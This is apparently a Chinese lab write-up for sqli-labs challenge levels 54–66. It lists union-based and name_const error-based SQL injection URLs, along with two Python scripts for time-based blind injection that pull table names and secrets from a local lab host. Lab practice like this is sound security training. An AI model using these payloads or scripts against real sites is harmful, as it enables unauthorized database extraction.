【靶场练习_sqli-labs】SQLi-LABS Page-4 (Challenges)
Less-54:
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
- Your Password:CL0FY8NWDK
?id=-1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='CL0FY8NWDK'--+
- Your Login name:challenges
- Your Password:id,sessid,secret_TOM0,tryy
?id=-1' union select 1,group_concat(sessid),group_concat(secret_TOM0) from CL0FY8NWDK--+
- Your Login name:d8074a35855a7f4935e3e19222d9a9eb
- Your Password:bgAkTAN2t9AwqzSZyXtjhag4
有点迷,不知道这个怎么玩,反正登陆失败了,sessid和secre_TOMO都试过了Orz;
好吧,是没看界面,它的中文意思 :“恭喜你成功了”,【话说你以前不是蓝色的嘛!!!
Less-55:
?id=1) and (1 ,?id=1) and (0
- 回显不同,小括号闭合
?id=0) union select 1,group_concat(table_name),database() from information_schema.tables where table_schema=database()--+ :
- Your Login name:MYGNMGLTYN
- Your Password:challenges
?id=0) union select 1,group_concat(column_name),database() from information_schema.columns where table_schema=database() and table_name='MYGNMGLTYN'--+
- Your Login name:id,sessid,secret_81NP,tryy
- Your Password:challenges
- Your Login name:56aKKaL0ZO1elWAFGWwRtGcE
- Your Password:challenges
- 56aKKaL0ZO1elWAFGWwRtGcE
Less-56:
?id=1' and '0,?id=1' and '1
- 回显不同,单引号
?id=2' and '1
- 查出第一条数据,小括号闭合
?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
- Your Login name:MYGNMGLTYN
- Your Password:3
?id=0') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='MYGNMGLTYN'--+
?id=0') union select 1,group_concat(secret_81NP),3 from MYGNMGLTYN--+
- Your Login name:56aKKaL0ZO1elWAFGWwRtGcE
- Your Password:3
查出:
- 56aKKaL0ZO1elWAFGWwRtGcE
Less-57:
?id=1" and "0,?id=1" and "1
- 双引号闭合
?id=2" and "1
- 回显第二条,没有小括号
?id=0" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
- Your Login name:2
- Your Password:KXPI7R3J3M
?id=0" union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database()--+
- Your Login name:2
- Your Password:id,sessid,secret_24A7,tryy
?id=0" union select 1,2,group_concat(secret_24A7) from KXPI7R3J3M--+
- Your Login name:2
- Your Password:TNxWAHFGN4l1FiZOpr3F6yju
查出:
- TNxWAHFGN4l1FiZOpr3F6yju
Less-58:
?id=1' and '1 ,?id=1' and '0
- 单引号闭合
?id=2') and ('1
- 报错,无小括号
?id=' union (SELECT * FROM (SELECT name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1),name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)) a)--+
- Duplicate column name 'ZQ803A690O'
?id=' union (SELECT * FROM (SELECT name_const((select group_concat(column_name) from information_schema.columns where table_schema=database()),1),name_const((select group_concat(column_name) from information_schema.columns where table_schema=database()),1)) a)--+
- Duplicate column name 'id,sessid,secret_TB31,tryy'
?id=' union (SELECT * FROM (SELECT name_const((select group_concat(secret_TB31) from ZQ803A690O),1),name_const((select group_concat(secret_TB31) from ZQ803A690O),1)) a)--+
- Duplicate column name '9f7VYPJeYRbMCqZ7mGZkzOlu'
提交:
- 9f7VYPJeYRbMCqZ7mGZkzOlu
Less-59:
?id=1 and 1,?id=1 and 0
- 数字型
?id=2 and 1
- 回显第二条,无小括号
?id=0 union (SELECT * FROM (SELECT name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1),name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)) a)--+
- Duplicate column name 'DDCETXN5RL'
?id=0 union (SELECT * FROM (SELECT name_const((select group_concat(column_name) from information_schema.columns where table_schema=database()),1),name_const((select group_concat(column_name) from information_schema.columns where table_schema=database()),1)) a)--+
- Duplicate column name 'id,sessid,secret_NW54,tryy'
?id=0 union (SELECT * FROM (SELECT name_const((select group_concat(secret_NW54) from DDCETXN5RL),1),name_const((select group_concat(secret_NW54) from DDCETXN5RL),1)) a)--+
- Duplicate column name '1yChO5jTqiN4t1HpROwWWTBt'
提交:
- 1yChO5jTqiN4t1HpROwWWTBt
Less-60:
?id=2" and "0--+ ,?id=2" and "1--+
- 双引号闭合,查出第一条无小括号
?id=-1")union (SELECT * FROM (SELECT name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1),name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)) a)--+
- Duplicate column name 'HKTX3I9V9F'
?id=-1")union (SELECT * FROM (SELECT name_const((select group_concat(column_name) from information_schema.columns where table_schema=database()),1),name_const((select group_concat(column_name) from information_schema.columns where table_schema=database()),1)) a)--+
- Duplicate column name 'id,sessid,secret_39ZN,tryy'
?id=-1")union (SELECT * FROM (SELECT name_const((select group_concat(secret_39ZN) from HKTX3I9V9F),1),name_const((select group_concat(secret_39ZN) from HKTX3I9V9F),1)) a)--+
- Duplicate column name 'JGw1EIsBhUycAxCTGOmn3b23'提交:
提交:
- JGw1EIsBhUycAxCTGOmn3b23
Less-61:有两个小括号Orz
?id=1' and '0,?id=1' and '1
- 单引号闭合
?id=2' and '1
- 小括号闭合
?id=-1'))union (SELECT * FROM (SELECT name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1),name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)) a)--+
- Duplicate column name 'P1EYFNKQS3'
Less-62:
?id=1' and '0,?id=1' and '1
- 单引号闭合
?id=2' and '1
- 小括号闭合
?id=2' and sleep(3) and '1--+
- 检测出来用时间盲注
'''
@Modify Time @Author
------------ -------
2019/10/10 13:03 laoalo
'''
# -*- coding:utf-8 -*-
import requests
import time url = "http://192.168.199.190/sqli-labs-master/Less-62/?id=1') "
def database_length():
global url
for i in range(1,10000):
sql = url + " and if((length(database()))>"+str(i)+",0,sleep(3)) +--+"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
print(sql)
if(e_time-s_time) > 3:
print("数据库长:",i)
break
def database_name(database_length):
global url
sql = url + " and if(ascii(substr((select database()),{num},1))>{asc},0,sleep(3)) +--+"
db_name = ''
for num in range(1, database_length+1):
for asc in range(ord('a'), ord('z') + 1):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
db_name += chr(asc)
print("数据库名:",db_name)
break
def table_length(database_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat(table_name) from information_schema.tables where table_schema='"+database_name+"')))>" + str(i) + ",0,sleep(3)) +--+"
s_time = time.time()
response = requests.get(url=sql)
e_time = time.time()
print(sql)
if (e_time - s_time) > 3:
print(database_name,"中的所有数据表名长:", i)
break
def table_name(table_length,database_name):
global url
sql = url + " and if(ascii(substr((select group_concat(table_name separator '@') from information_schema.tables where table_schema='"+database_name+"'),{num},1))>{asc},0,sleep(3)) +--+"
table_name = ''
for num in range(1, table_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
table_name += chr(asc)
print("所有的数据表名:", table_name)
break
def column_length(table_name,database_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat(column_name) from information_schema.columns where table_name='" + table_name + "' and table_schema='"+database_name+"')))>" + str(i) + ",0,sleep(3)) +--+"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
# print(sql)
if (e_time - s_time) > 3:
print(table_name, "中的所有字段名长:", i)
break
def column_name(column_length,table_name,database_name):
global url
sql = url + " and if(ascii(substr((select group_concat(column_name separator '@') from information_schema.columns where table_name='" + table_name + "' and table_schema='"+database_name+"'),{num},1))>{asc},0,sleep(3)) +--+"
table_name = ''
for num in range(1, column_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
table_name += chr(asc)
print("所有的字段名:", table_name)
break
def data_length(column_name,table_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat("+column_name+" separator '@') from " + table_name + ")))>" + str(i) + ",0,sleep(3)) +--+"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
# print(sql)
if (e_time - s_time) > 3:
print(column_name, "字段的值长:", i)
break
def data_detail(data_length,column_name,table_name):
global url
sql = url + " and if(ascii(substr((select group_concat("+column_name+" separator '@') from " + table_name + "),{num},1))>{asc},0,sleep(3)) +--+"
data = ''
for num in range(1, data_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
data += chr(asc)
print(column_name,"字段的值:", data)
break
if __name__ == '__main__':
# database_length() #数据库长: 10
# database_name(10) #数据库名: challenges
# table_length('challenges')#challenges 中的所有数据表名长: 10
# table_name(10, 'challenges')#所有的数据表名: P1EYFNKQS3
# column_length('P1EYFNKQS3','challenges') #P1EYFNKQS3 中的所有字段名长: 26
# column_name(26,'P1EYFNKQS3','challenges')#所有的字段名: id@sessid@secret_ZGLB@tryy
# data_length('secret_ZGLB', 'P1EYFNKQS3')#secret_ZGLB 字段的值长: 24
data_detail(24, 'secret_ZGLB', 'P1EYFNKQS3')#secret_ZGLB 字段的值: o6x95TdsyX3fTTBuJcgRIpoa
Less-63:
?id=1' and '0,?id=1' and '1
- 单引号闭合
?id=1' and sleep(1) --+
- 检测出来用时间盲注
脚本用62的把这里改了就行
url = "http://192.168.199.190/sqli-labs-master/Less-63/?id=1' "
Less-64:
?id=1 and 0,?id=1 and 0
- 数字型
?id=2 and 1
- 返回第一条,小括号
?id=(1 and if((length(database())=10),sleep(1),1))
- select * from users where id=(1 and if((length(database())=8),sleep(1),1)); 时间盲注
'''
@Modify Time @Author
------------ -------
2019/10/11 20:15 laoalo
'''
# -*- coding:utf-8 -*-
import requests
import time url = "http://192.168.199.190/sqli-labs-master/Less-64/?id=1 "
def database_length():
global url
for i in range(1,10000):
sql = url + " and if((length(database()))>"+str(i)+",0,sleep(1))"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
print(sql)
if(e_time-s_time) > 3:
print("数据库长:",i)
break
def database_name(database_length):
global url
sql = url + " and if(ascii(substr((select database()),{num},1))>{asc},0,sleep(1)) "
db_name = ''
for num in range(1, database_length+1):
for asc in range(ord('a'), ord('z') + 1):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
db_name += chr(asc)
print("数据库名:",db_name)
break
def table_length(database_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat(table_name) from information_schema.tables where table_schema='"+database_name+"')))>" + str(i) + ",0,sleep(1)) "
s_time = time.time()
response = requests.get(url=sql)
e_time = time.time()
print(sql)
if (e_time - s_time) > 3:
print(database_name,"中的所有数据表名长:", i)
break
def table_name(table_length,database_name):
global url
sql = url + " and if(ascii(substr((select group_concat(table_name separator '@') from information_schema.tables where table_schema='"+database_name+"'),{num},1))>{asc},0,sleep(1))"
table_name = ''
for num in range(1, table_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
table_name += chr(asc)
print("所有的数据表名:", table_name)
break
def column_length(table_name,database_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat(column_name) from information_schema.columns where table_name='" + table_name + "' and table_schema='"+database_name+"')))>" + str(i) + ",0,sleep(1))"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
# print(sql)
if (e_time - s_time) > 3:
print(table_name, "中的所有字段名长:", i)
break
def column_name(column_length,table_name,database_name):
global url
sql = url + " and if(ascii(substr((select group_concat(column_name separator '@') from information_schema.columns where table_name='" + table_name + "' and table_schema='"+database_name+"'),{num},1))>{asc},0,sleep(1))"
table_name = ''
for num in range(1, column_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
table_name += chr(asc)
print("所有的字段名:", table_name)
break
def data_length(column_name,table_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat("+column_name+" separator '@') from " + table_name + ")))>" + str(i) + ",0,sleep(1))"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
# print(sql)
if (e_time - s_time) > 3:
print(column_name, "字段的值长:", i)
break
def data_detail(data_length,column_name,table_name):
global url
sql = url + " and if(ascii(substr((select group_concat("+column_name+" separator '@') from " + table_name + "),{num},1))>{asc},0,sleep(1))"
data = ''
for num in range(1, data_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
data += chr(asc)
print(column_name,"字段的值:", data)
break
if __name__ == '__main__':
# database_length() #数据库长: 10
# database_name(10) #数据库名: challenges
# table_length('challenges')#challenges 中的所有数据表名长: 10
# table_name(10, 'challenges')# 所有的数据表名: DMQZ801XDN
# column_length('DMQZ801XDN','challenges') #P1EYFNKQS3 中的所有字段名长: 26
# column_name(26,'DMQZ801XDN','challenges')#所有的字段名: id@sessid@secret_PBSY@……
# data_length('secret_PBSY', 'DMQZ801XDN')#secret_PBSY 字段的值长: 24
data_detail(24, 'secret_PBSY', 'DMQZ801XDN')#secret_PBSY 字段的值: gSNmoKm4ctz4y……
Less-65:
?id=1" and "0,?id=1" and "0
- 双引号闭合
?id=2" and "1
- 回显第一条,小括号闭合
?id=2" and 1 and 1))--+,?id=2" and 1 and 0))--+ ==》select * from users where id=(("2" and 1 and 0))--+"));
- 无回现,没有双括号
?id=2" and if((length(database())=10),sleep(1),1))--+
- 时间盲注
Less-66:
这题先过掉,不知道为什么在我这里挂了
查了一下我的靶场,emmm好吧,sqli-labs系列提前结束Orz
【靶场练习_sqli-labs】SQLi-LABS Page-4 (Challenges)的更多相关文章
- Sqli labs系列-less-1 详细篇
要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了, ...
- Sqli labs系列-less-2 详细篇
就今天晚上一个小插曲,瞬间感觉我被嘲讽了. SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊. ...
- SQLI LABS Basic Part(1-22) WriteUp
好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...
- Sqli labs系列-less-3 。。。
原本想着找个搜索型的注入玩玩,毕竟昨天被实力嘲讽了 = = . 找了好长时间,我才发现,我没有 = = ,网上搜了一个存在搜索型注入的源码,我看了好长时间,楞没看出来从哪里搜索注入了....估计是我太 ...
- Sqli - Labs 靶场笔记(一)
Less - 1: 页面: URL: http://127.0.0.1/sqli-labs-master/Less-1/ 测试: 1.回显正常,说明不是数字型注入, http://127.0.0.1/ ...
- SQL注入系列:SQLi Labs
前言 关于注释 说明:在SQL中--[空格]表示注释,但是在URL中--空格在发送请求的时候会把最后的空格去掉,所以用--+代替,因为+在被URL编码后会变成空格 MYSQL有三种常用注释: --[空 ...
- SQLI LABS Challenges Part(54-65) WriteUp
终于到了最后一部分,这些关跟之前不同的是这里是限制次数的. less-54: 这题比较好玩,10次之内爆出数据.先试试是什么类型: ?id=1' and '1 ==>>正常 ?id=1' ...
- SQLI LABS Stacked Part(38-53) WriteUp
这里是堆叠注入部分 less-38: 这题啥过滤都没有,直接上: ?id=100' union select 1,2,'3 less-39: 同less-38: ?id=100 union selec ...
- SQLI LABS Advanced Part(23-37) WriteUp
继续继续!这里是高级部分! less-23: 提示输入id参数,尝试: ?id=1' and '1 返回的结果与?id=1相同,所以可以直接利用了. ?id=1' order by 5# 可是页面返回 ...
- Sqli labs系列-less-5&6 报错注入法(下)
我先输入 ' 让其出错. 然后知道语句是单引号闭合. 然后直接 and 1=1 测试. 返回正常,再 and 1=2 . 返回错误,开始猜表段数. 恩,3位.让其报错,然后注入... 擦,不错出,再加 ...
随机推荐
- (appium+python)UI自动化_03_元素定位工具
前言 在UI自动化过程中,需要对手机app上的元素进行定位,然后进一步编写自动化脚本操作app.定位元素首先需要定位工具来辅助查看页面元素.小编常用的定位工具有2种,分别是uiautomatorvie ...
- MySQL-- 数据库的三范式
目前关系数据库有六种范式:第一范式(1NF).第二范式(2NF).第三范式(3NF).巴斯-科德范式(BCNF).第四范式(4NF)和第五范式(5NF,又称完美范式). 而通常我们用的最多的就是第一范 ...
- python操作mysql之增删改查
[insert] import MySQLdb conn = MySQLdb.connect(","08day5" ) cur = conn.cursor() #把数据放 ...
- 线程休眠只会用 Thread.sleep?来,教你新姿势!
线程休眠是 Java 开发经常会用到的一个手段,就是让当前线程睡一会儿,睡醒之后再继续运行. 咱大多数程序员,多线程虽然学得不好,但线程休眠,无人不知,无人不晓,也都会用,不就是用 Thread.sl ...
- 在win7下面清除samba用户的登录状态
相信会有一部分刚开始测试samba服务器的人会有过这样的疑惑? 在win7下面使用一个samba用户的username和passwd登录过后,之后每次进去都是以这样的username和passwd进去 ...
- XSLT学习(九)通过JavaScript转化xml
如果您的浏览器支持 XSLT,那么在浏览器中它可被用来将文档转换为 XHTML. JavaScript 解决方案 在前面的章节,我们已向您讲解如何使用 XSLT 将某个 XML 文档转换为 XHTML ...
- opencv保存图片路径包含中文乱码解决方案
# coding: utf-8 import numpy as np import cv2 img = cv2.imread('1.jpg',1) cv2.imshow('image', img) k ...
- protocols - 协议定义文件
描述 该文件为普通 ASCII 文件,它描述了 TCP/IP 子系统中各类 DARPA internet 协议族.你应该参考这个文件, 而不是使用 ARPA 的 include 文件中的号码, 更不必 ...
- vue,一路走来(15)--简单投票系统
今天记录一下简单的投票系统,主要实现选中至少五张作品,并提交投票. 思路:选中作品,将作品id存入到数组里. 取消投票,则从数组中移除该作品id. 如图效果: <li v-for="( ...
- python正则表达式 re (二)sub
背景: re.sub是re模块重要的组成部分,并且功能也非常强大,主要功能实现正则的替换. re.sub定义: sub(pattern, repl, string, count=0, flags=0) ...